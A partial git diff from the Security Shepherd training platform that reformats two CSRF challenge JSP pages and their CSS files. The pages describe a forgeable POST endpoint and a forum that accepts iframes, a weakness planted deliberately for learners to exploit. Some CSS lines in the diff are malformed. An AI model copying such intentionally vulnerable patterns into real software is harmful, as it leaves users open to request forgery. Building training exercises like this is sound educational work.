+		String userClass = null;
+		if(ses.getAttribute("userClass") != null)
+		{
+			userClass = Encode.forHtml(ses.getAttribute("userClass").toString());
+		}
+		String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= bundle.getString("title.csrf2") %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= bundle.getString("title.csrf2") %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= bundle.getString("title.csrf2") %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.intro") %>
-        <br/> <br/> <a> POST /user/csrfchallengetwo/plusplus</a> <br/>
-            <%= bundle.getString("challenge.withThisParameter") %>
-        userId = <a><%= userId %>
-    </a> <br/>
-        <br/>
-            <%= bundle.getString("challenge.whereIdIsUserBeenIncremented.1") %>&nbsp;<%= bundle.getString("challenge.userIdExample") %>&nbsp;<%= bundle.getString("challenge.whereIdIsUserBeenIncremented.2") %>&nbsp;
-        <br/> <br/>
-            <%= bundle.getString("challenge.useForumForIframe") %>
-            <%
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= bundle.getString("title.csrf2") %></h2>
+		<p>
+			<%= bundle.getString("challenge.intro") %>
+			<br /> <br /> <a> POST /user/csrfchallengetwo/plusplus</a> <br />
+			<%= bundle.getString("challenge.withThisParameter") %>
+			userId = <a><%= userId %></a> <br />
+			<br />
+			<%= bundle.getString("challenge.whereIdIsUserBeenIncremented.1") %>&nbsp;<%= bundle.getString("challenge.userIdExample") %>&nbsp;<%= bundle.getString("challenge.whereIdIsUserBeenIncremented.2") %>&nbsp;
+			<br /> <br />
+			<%= bundle.getString("challenge.useForumForIframe") %>
+			<% 
 				String moduleId = Getter.getModuleIdFromHash(ApplicationRoot, levelHash);	
 				if (Getter.isCsrfLevelComplete(ApplicationRoot, moduleId, userId)) 
 				{ %>
+		
+		<h2 class='title'><%= bundle.getString("result.challengeCompleted") %></h2>
+		<p>
+			<%= bundle.getString("result.congratsTheKeyIs") %>
+			<b> <a><%=	Hash.generateUserSolution(Getter.getModuleResult(ApplicationRoot, moduleId), (String)ses.getAttribute("userName")) %></a></b><br />
+			<br />
+			<% } %>
+		
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("forum.iframe.whatToDo") %></td>
+				</tr>
+				<tr>
+					<td><input style="width: 400px;" id="myMessageAris"
+						type="text" autocomplete="off" /></td>
+				</tr>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("forum.postMessage") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("forum.loading") %></p>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <h2 class='title'><%= bundle.getString("result.challengeCompleted") %>
-    </h2>
-    <p>
-            <%= bundle.getString("result.congratsTheKeyIs") %>
-        <b>
-            <a><%=    Hash.generateUserSolution(Getter.getModuleResult(ApplicationRoot, moduleId), (String) ses.getAttribute("userName")) %>
-            </a></b><br/>
-        <br/>
-            <% } %>
-
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("forum.iframe.whatToDo") %>
-                </td>
-            </tr>
-            <tr>
-                <td><input style="width: 400px;" id="myMessageAris"
-                           type="text" autocomplete="off"/></td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("forum.postMessage") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("forum.loading") %>
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
-
-    <div id="resultsDiv">
-        <%= Getter.getCsrfForumWithIframe(ApplicationRoot, userClass, Getter.getModuleIdFromHash(ApplicationRoot, levelHash), bundle) %>
-    </div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        var theMessage = $("#myMessageAris").val();
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                dataType: "text",
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    myMessage: theMessage,
-                    csrfToken: "<%= csrfToken %>"
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv">
+			<%= Getter.getCsrfForumWithIframe(ApplicationRoot, userClass, Getter.getModuleIdFromHash(ApplicationRoot, levelHash), bundle) %>
+		</div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				var theMessage = $("#myMessageAris").val();
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						dataType: "text",
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							myMessage: theMessage,
+							csrfToken: "<%= csrfToken %>"
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/z6b2f5ebbe112dd09a6c430a167415820adc5633256a7b44a7d1e262db105e3c.jsp b/src/main/webapp/challenges/z6b2f5ebbe112dd09a6c430a167415820adc5633256a7b44a7d1e262db105e3c.jsp
index 9f01b87dd..cfd053b03 100644
--- a/src/main/webapp/challenges/z6b2f5ebbe112dd09a6c430a167415820adc5633256a7b44a7d1e262db105e3c.jsp
+++ b/src/main/webapp/challenges/z6b2f5ebbe112dd09a6c430a167415820adc5633256a7b44a7d1e262db105e3c.jsp
@@ -1,174 +1,178 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * Cross Site Request Forgery Challenge 3
-     *
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
-    String levelName = "CSRF Challenge 3";
-    String levelHash = new String("z6b2f5ebbe112dd09a6c430a167415820adc5633256a7b44a7d1e262db105e3c");
+/**
+ * Cross Site Request Forgery Challenge 3
+ * 
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ * 
+ * @author Mark Denihan
+ */
+ String levelName = "CSRF Challenge 3";
+ String levelHash = new String("z6b2f5ebbe112dd09a6c430a167415820adc5633256a7b44a7d1e262db105e3c");
 
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.csrf.csrfStrings", locale);
-
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            // Getting Session Variables
-            //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-
-            String ApplicationRoot = getServletContext().getRealPath("");
-            String csrfToken = Encode.forHtml(tokenCookie.getValue());
-            String userClass = null;
-            if (ses.getAttribute("userClass") != null) {
-                userClass = Encode.forHtml(ses.getAttribute("userClass").toString());
-            }
-            String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.csrf.csrfStrings", locale);
+ 
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ 		// Getting Session Variables
+		//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+		
+		String ApplicationRoot = getServletContext().getRealPath("");
+		String csrfToken = Encode.forHtml(tokenCookie.getValue());
+		String userClass = null;
+		if(ses.getAttribute("userClass") != null)
+		{
+			userClass = Encode.forHtml(ses.getAttribute("userClass").toString());
+		}
+		String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= bundle.getString("title.csrf3") %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= bundle.getString("title.csrf3") %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= bundle.getString("title.csrf3") %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.intro") %>
-        <br/> <br/> <a> POST /user/csrfchallengethree/plusplus</a> <br/>
-            <%= bundle.getString("challenge.withTheseParameters") %>
-        <a>userid=<%= bundle.getString("challenge.userIdExample") %> &
-            csrfToken=<%= bundle.getString("challenge.userTokenExample") %>
-        </a> <br/>
-        <br/>
-            <%= bundle.getString("challenge.csrfTokenGenerated") %>&nbsp;<%= bundle.getString("challenge.userIdExample") %>&nbsp;<%= bundle.getString("challenge.whereIdIsUserBeenIncremented.2") %>&nbsp;<%= bundle.getString("challenge.yourIdIs") %>&nbsp;<a><%= userId %>
-    </a><%= bundle.getString("challenge.yourIdIs.1") %>
-        <br/> <br/>
-            <%= bundle.getString("challenge.useForumForIframe") %>
-            <%
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= bundle.getString("title.csrf3") %></h2>
+		<p>
+			<%= bundle.getString("challenge.intro") %>
+			<br /> <br /> <a> POST /user/csrfchallengethree/plusplus</a> <br />
+			<%= bundle.getString("challenge.withTheseParameters") %>
+			<a>userid=<%= bundle.getString("challenge.userIdExample") %> &
+				csrfToken=<%= bundle.getString("challenge.userTokenExample") %></a> <br />
+			<br />
+			<%= bundle.getString("challenge.csrfTokenGenerated") %>&nbsp;<%= bundle.getString("challenge.userIdExample") %>&nbsp;<%= bundle.getString("challenge.whereIdIsUserBeenIncremented.2") %>&nbsp;<%= bundle.getString("challenge.yourIdIs") %>&nbsp;<a><%= userId %></a><%= bundle.getString("challenge.yourIdIs.1") %>
+			<br /> <br />
+			<%= bundle.getString("challenge.useForumForIframe") %>
+			<% 
 				String moduleId = Getter.getModuleIdFromHash(ApplicationRoot, levelHash);
 				if (Getter.isCsrfLevelComplete(ApplicationRoot, moduleId, userId)) 
 				{ %>
+		
+		<h2 class='title'><%= bundle.getString("result.challengeCompleted") %></h2>
+		<p>
+			<%= bundle.getString("result.congratsTheKeyIs") %>
+			<b> <a><%=Hash.generateUserSolution(Getter.getModuleResult(ApplicationRoot, moduleId), (String)ses.getAttribute("userName")) %></a></b><br />
+			<br />
+			<% } %>
+		
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("forum.iframe.whatToDo") %></td>
+				</tr>
+				<tr>
+					<td><input style="width: 400px;" id="myMessage" type="text" />
+					</td>
+				</tr>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("forum.postMessage") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("forum.loading") %></p>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <h2 class='title'><%= bundle.getString("result.challengeCompleted") %>
-    </h2>
-    <p>
-            <%= bundle.getString("result.congratsTheKeyIs") %>
-        <b>
-            <a><%=Hash.generateUserSolution(Getter.getModuleResult(ApplicationRoot, moduleId), (String) ses.getAttribute("userName")) %>
-            </a></b><br/>
-        <br/>
-            <% } %>
-
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("forum.iframe.whatToDo") %>
-                </td>
-            </tr>
-            <tr>
-                <td><input style="width: 400px;" id="myMessage" type="text"/>
-                </td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("forum.postMessage") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("forum.loading") %>
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
-
-    <div id="resultsDiv">
-        <%= Getter.getCsrfForumWithIframe(ApplicationRoot, userClass, Getter.getModuleIdFromHash(ApplicationRoot, levelHash), bundle) %>
-    </div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        var theMessage = $("#myMessage").val();
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                dataType: "text",
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    myMessage: theMessage,
-                    csrfToken: "<%= csrfToken %>"
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv">
+			<%= Getter.getCsrfForumWithIframe(ApplicationRoot, userClass, Getter.getModuleIdFromHash(ApplicationRoot, levelHash), bundle) %>
+		</div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				var theMessage = $("#myMessage").val();
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						dataType: "text",
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							myMessage: theMessage,
+							csrfToken: "<%= csrfToken %>"
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/css/lessonCss/theCss.css b/src/main/webapp/css/lessonCss/theCss.css
index e18145123..bc0c121a7 100644
--- a/src/main/webapp/css/lessonCss/theCss.css
+++ b/src/main/webapp/css/lessonCss/theCss.css
@@ -1,195 +1,199 @@
 body {
-    margin: 0;
-    padding: 0;
-    font-size: 13px;
-    color: #090212;
+	margin: 0;
+	padding: 0;
+	font-size: 13px;
+	color: #090212;
 }
 
 body, th, td, input, textarea, select, option, p, div {
-    font-family: "Helvetica Neue", Helvetica Arial, "Lucida Grande",
-    sans-serif;
+	font-family: "Helvetica Neue", Helvetica Arial, "Lucida Grande",
+		sans-serif;
 }
 
 h1, h2, h3 {
-    font-weight: normal;
-    color: #0A000A;
+	font-weight: normal;
+	color: #0A000A;
 }
 
 h1 {
-    letter-spacing: -2px;
-    font-size: 3em;
+	letter-spacing: -2px;
+	font-size: 3em;
 }
 
 h2 {
-    letter-spacing: -1px;
-    font-size: 2em;
+	letter-spacing: -1px;
+	font-size: 2em;
 }
 
 h2 a {
-    color: #0A000A;
+	color: #0A000A;
 }
 
 h3 {
-    font-size: 1em;
+	font-size: 1em;
 }
 
 p, ul, ol {
-    line-height: 200%;
-    word-wrap: break-word;
+	line-height: 200%;
+	word-wrap: break-word;
 }
 
 a {
-    color: #9B1AC8;
-    word-wrap: break-word;
+	color: #9B1AC8;
+	word-wrap: break-word;
 }
 
 b {
-    word-wrap: break-word;
+	word-wrap: break-word;
 }
 
 a:hover {
-    text-decoration: none;
-    color: #E6B715;
+	text-decoration: none;
+	color: #E6B715;
 }
 
 td {
-    word-wrap: break-word;
-    max-width: 400px;
+	word-wrap: break-word;
+	max-width: 400px;
 }
 
 #wrapper {
-    /* Empty */
-
+	/* Empty */
+	
 }
 
 #header {
-    width: 760px;
-    height: 288px;
-    margin: 0 auto;
+	width: 760px;
+	height: 288px;
+	margin: 0 auto;
 }
 
 #header h1, #header p {
-    margin: 0;
-    color: #A878EF;
+	margin: 0;
+	color: #A878EF;
 }
 
 #header h1 {
-    padding: 65px 0 0 70px;
+	padding: 65px 0 0 70px;
 }
 
 #header p {
-    padding-left: 73px;
-    margin-top: -10px;
+	padding-left: 73px;
+	margin-top: -10px;
 }
 
 #header a {
-    color: #A878EF;
-    text-decoration: none;
+	color: #A878EF;
+	text-decoration: none;
 }
 
 #page {
-    width: 1000px;
-    margin: 0 auto;
+	width: 1000px;
+	margin: 0 auto;
 }
 
 #contentDiv {
-    float: right;
-    width: 100%;
-    margin: 0;
-    padding-left: 20px;
+	float: right;
+	width: 100%;
+	margin: 0;
+	padding-left: 20px;
 }
 
 #resultDiv {
-    word-wrap: break-word;
-    max-width: 610px;
+	word-wrap: break-word;
+	max-width: 610px;
 }
 
 .errorMessage {
-    padding: 10px 10px 10px 10px;
-    background: #FFFFFF;
-    border-style: ridge;
-    border-width: 5px;
-    border-color: #E42217;
+	padding: 10px 10px 10px 10px;
+	background: #FFFFFF;
+	border-style: ridge;
+	border-width: 5px;
+	border-color: #E42217;
 }
 
 .errorAlert {
-    background: #E42217;
-    color: #FFFFFF;
-    padding-left: 10px;
+	background: #E42217;
+	color: #FFFFFF;
+	padding-left
+	=
+	10px;
 }
 
 .successAlert {
-    background: #7B55B4;
-    color: #FFFFFF;
-    padding-left: 10px;
+	background: #7B55B4;
+	color: #FFFFFF;
+	padding-left
+	=
+	10px;
 }
 
 .title {
-    margin: 0;
-    padding-bottom: 5px;
-    border-bottom: 2px solid #A878EF;
+	margin: 0;
+	padding-bottom: 5px;
+	border-bottom: 2px solid #A878EF;
 }
 
 #sidebar {
-    float: left;
-    width: 250px;
+	float: left;
+	width: 250px;
 }
 
 #sidebar ul {
-    margin: 0;
-    padding: 0;
-    list-style: none;
+	margin: 0;
+	padding: 0;
+	list-style: none;
 }
 
 #footer {
-    clear: both;
-    width: 760px;
-    height: 40px;
-    margin: 0 auto;
-    padding: 20px 0 0 0;
-    text-align: center;
-    font-size: smaller;
-    color: #FFFFFF;
+	clear: both;
+	width: 760px;
+	height: 40px;
+	margin: 0 auto;
+	padding: 20px 0 0 0;
+	text-align: center;
+	font-size: smaller;
+	color: #FFFFFF;
 }
 
 #footer a {
-    color: #FFFFFF;
+	color: #FFFFFF;
 }
 
 .tooltipped {
-    position: relative;
+	position: relative;
 }
 
 .tooltipped::before {
-    position: absolute;
-    z-index: 1000001;
-    display: none;
-    width: 0;
-    height: 0;
-    color: rgba(0, 0, 0, 0.8);
-    pointer-events: none;
-    content: "";
-    border: 5px solid;
+	position: absolute;
+	z-index: 1000001;
+	display: none;
+	width: 0;
+	height: 0;
+	color: rgba(0, 0, 0, 0.8);
+	pointer-events: none;
+	content: "";
+	border: 5px solid;
 }
 
 .tooltipped::after {
-    background: rgba(212, 212, 212, 0.8);
-    border: 2px solid rgba(168, 120, 239, 0.8);
-    border-radius: 3px;
-    content: attr(aria-label);
-    display: inline-block;
-    font: normal normal 11px/1.5 Helvetica, arial, nimbussansl,
-    liberationsans, freesans, clean, sans-serif;
-    letter-spacing: 0.5px;
-    padding: 5px 8px;
-    pointer-events: none;
-    position: absolute;
-    text-align: center;
-    text-decoration: none;
-    text-shadow: none;
-    text-transform: none;
-    white-space: pre;
-    word-wrap: break-word;
-    z-index: 1000000;
-    -webkit-font-smoothing: subpixel-antialiased;
+	background: rgba(212, 212, 212, 0.8);
+	border: 2px solid rgba(168, 120, 239, 0.8);
+	border-radius: 3px;
+	content: attr(aria-label);
+	display: inline-block;
+	font: normal normal 11px/1.5 Helvetica, arial, nimbussansl,
+		liberationsans, freesans, clean, sans-serif";
+	letter-spacing: 0.5px;
+	padding: 5px 8px;
+	pointer-events: none;
+	position: absolute;
+	text-align: center;
+	text-decoration: none;
+	text-shadow: none;
+	text-transform: none;
+	white-space: pre;
+	word-wrap: break-word;
+	z-index: 1000000;
+	-webkit-font-smoothing: subpixel-antialiased;
 }
\ No newline at end of file
diff --git a/src/main/webapp/css/theCss.css b/src/main/webapp/css/theCss.css
index e445c41a3..2ad30e21c 100644
--- a/src/main/webapp/css/theCss.css
+++ b/src/main/webapp/css/theCss.css
@@ -1,499 +1,501 @@
 body {
-    margin: 0;
-    padding: 0;
-    background: #FFFFFF url(images/grassTile.jpg) repeat-x top center;
-    font-size: 13px;
-    color: #090212;
+	margin: 0;
+	padding: 0;
+	background: #FFFFFF url(images/grassTile.jpg) repeat-x top center;
+	font-size: 13px;
+	color: #090212;
 }
 
 body, th, td, input, textarea, select, option, p, div {
-    font-family: "Helvetica Neue", Helvetica Arial, "Lucida Grande",
-    sans-serif;
+	font-family: "Helvetica Neue", Helvetica Arial, "Lucida Grande",
+		sans-serif;
 }
 
 h1, h2, h3 {
-    font-weight: normal;
-    color: #0A000A;
+	font-weight: normal;
+	color: #0A000A;
 }
 
 h1 {
-    letter-spacing: -2px;
-    font-size: 3em;
+	letter-spacing: -2px;
+	font-size: 3em;
 }
 
 h2 {
-    letter-spacing: -1px;
-    font-size: 2em;
+	letter-spacing: -1px;
+	font-size: 2em;
 }
 
 h2 a {
-    color: #0A000A;
+	color: #0A000A;
 }
 
 h3 {
-    font-size: 1.5em;
+	font-size: 1.5em;
 }
 
 p, ul, ol {
-    line-height: 200%;
+	line-height: 200%;
 }
 
 a {
-    color: #9B1AC8;
+	color: #9B1AC8;
 }
 
 a:hover {
-    text-decoration: none;
-    color: #E6B715;
+	text-decoration: none;
+	color: #E6B715;
 }
 
 #wrapper {
-    /* Empty */
-
+	/* Empty */
+	
 }
 
 #header {
-    width: 757px;
-    height: 240px;
-    margin: 0 auto;
-    background: url(images/shepherdAndSheep.jpg) no-repeat right top;
+	width: 757px;
+	height: 240px;
+	margin: 0 auto;
+	background: url(images/shepherdAndSheep.jpg) no-repeat right top;
 }
 
 #header h1, #header p {
-    margin: 0;
-    color: #A878EF;
+	margin: 0;
+	color: #A878EF;
 }
 
 #header h1 {
-    padding: 65px 0 0 70px;
+	padding: 65px 0 0 70px;
 }
 
 #header p {
-    padding-left: 73px;
-    margin-top: -10px;
+	padding-left: 73px;
+	margin-top: -10px;
 }
 
 #header a {
-    color: #A878EF;
-    text-decoration: none;
+	color: #A878EF;
+	text-decoration: none;
 }
 
 #page {
-    width: 1000px;
-    margin: 0 auto;
+	width: 1000px;
+	margin: 0 auto;
 }
 
 #contentDiv {
-    float: right;
-    width: 685px;
-    margin: 0;
+	float: right;
+	width: 685px;
+	margin: 0;
 }
 
 .errorMessage {
-    padding: 10px 10px 10px 10px;
-    background: #FFFFFF;
-    border-style: ridge;
-    border-width: 5px;
-    border-color: #E42217;
+	padding: 10px 10px 10px 10px;
+	background: #FFFFFF;
+	border-style: ridge;
+	border-width: 5px;
+	border-color: #E42217;
 }
 
 .errorAlert {
-    background: #E42217;
-    color: #FFFFFF;
-    padding-left = 10px;
+	background: #E42217;
+	color: #FFFFFF;
+	padding-left
+	=
+	10px;
 }
 
 .successAlert {
-    background: #7B55B4;
-    color: #FFFFFF;
-    padding-left = 10px;
+	background: #7B55B4;
+	color: #FFFFFF;
+	padding-left
+	=
+	10px;
 }
 
 .title {
-    margin: 0;
-    padding-bottom: 5px;
-    border-bottom: 2px solid #A878EF;
+	margin: 0;
+	padding-bottom: 5px;
+	border-bottom: 2px solid #A878EF;
 }
 
 #sidebar {
-    width: 250px;
+	width: 250px;
 }
 
 #sidebar ul {
-    margin: 0;
-    padding: 0;
-    list-style: none;
+	margin: 0;
+	padding: 0;
+	list-style: none;
 }
 
 #sidebar li {
-
+	
 }
 
 #sidebar li ul {
-    padding: 15px 15px;
+	padding: 15px 15px;
 }
 
 #sidebar li li {
-    border-bottom: 1px dotted #FFFFFF;
-    padding-left: 15px;
